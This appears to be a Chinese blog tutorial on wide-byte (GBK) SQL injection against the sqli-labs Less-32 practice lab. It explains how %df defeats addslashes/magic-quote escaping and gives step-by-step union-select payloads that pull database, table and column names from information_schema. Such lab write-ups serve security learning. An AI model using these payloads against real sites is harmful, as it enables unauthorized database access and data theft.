SQL注入 - 宽字节注入

文章目录

SQL注入 - 宽字节注入

靶场 sqli - labs less-32

宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入

宽字节注入前置知识

php 5.4 以下低版本,修改配置文件然后强制执行,使用 magic_quotes_gpc 函数转义

php 复制代码
<?php
$a = "select * from admin where id ='$_REQUEST[8]'";
echo $a;
?>

php 5.4 以上高版本,删除掉了这个配置,通过特定函数使用addslashes() 函数转义

php 复制代码
<?php
$b = addslashes($_REQUEST[8]);
$a = "select * from admin where id ='$b'";
echo $a;
?>

SQL注入的核心是 闭合引号,注释后面的引号,让我们的输入跳出单双引号

sql 复制代码
select * from users where id='1' 

魔术引号的核心意义是不让你闭合,通过反斜杠转义你输入的单双引号反斜杠等

复制代码
绕过方法:
1、寻找不需要闭合的地方,如传参类型为init还是varchar
2、仔细查看作用域($_server)
3、宽字节注入

宽字节

两个单字节可以变为双字节,如:

复制代码
select * from users where id='1?/''

如数据库采用gbk编码方式,?/ 被解释成汉字则,' 会被逃逸出来

靶场实战

判断是否存在SQL注入

?id=1' and 1=1 ?id=1' and 1=2 发现被反斜杠转义了

复制代码
?id=1' and 1=1 --+
?id=1' and 1=2 --+

使用%df 进行宽字节注入绕过,发现存在SQL注入

复制代码
/ = 5c
%df = df
df5c = 運 (GBK编码字符)

?id=1%df' and 1=1 --+
?id=1%df' and 1=2 --+

判断位数

order by 语句可得 位数为3

复制代码
?id=1%df' order by 4 --+

判显错位

判断可得2,3

复制代码
?id=-1%df' union select 1,2,3 --+

判库名

判断可得 security

复制代码
?id=-1%df' union select 1,2,database() --+

判表名

复制代码
?id=-1%df' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 --+

判列名

复制代码
?id=-1%df' union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=0x7573657273 limit 0,1 --+

0x7573657273(16进制) = users
相关推荐
yexuhgu15 小时前
Redis如何解决哨兵通知延迟问题_优化客户端连接池动态刷新拓扑的订阅监听机制
jvm·数据库·python
洛水水15 小时前
Redis 协议与异步通信深度解析
数据库·redis·缓存
S1998_1997111609•X1 天前
论当今社会主义与人文关怀人格思想下的恶意仿生注入污染蜜罐描述进行函数值非法侵入爬虫的咼忄乂癿〇仺⺋.
数据库·网络协议·百度·ssh·开闭原则
其实防守也摸鱼1 天前
CTF密码学综合教学指南--第九章
开发语言·网络·python·安全·网络安全·密码学·ctf
倔强的石头_1 天前
kingbase备份与恢复实战(六)—— 备份自动化与保留策略:Windows任务计划+日志追溯
数据库
轻刀快马1 天前
别被 ORM 框架宠坏了:从一场“订单消失”悬案,看懂 MySQL 为什么要强推 InnoDB
数据库·mysql
学网安的肆伍1 天前
【043-WEB攻防篇】PHP应用&SQL注入&符号拼接&请求方法&HTTP头&JSON&编码类
sql·安全·php
李白你好1 天前
基于AI大模型的网络设备安全基线排查工具
安全
菩提小狗1 天前
每日安全情报报告 · 2026-05-02
网络安全·漏洞·cve·安全情报·每日安全
nikolay1 天前
AI重塑企业信息安全:攻防升级与信任重构
网络·人工智能·网络安全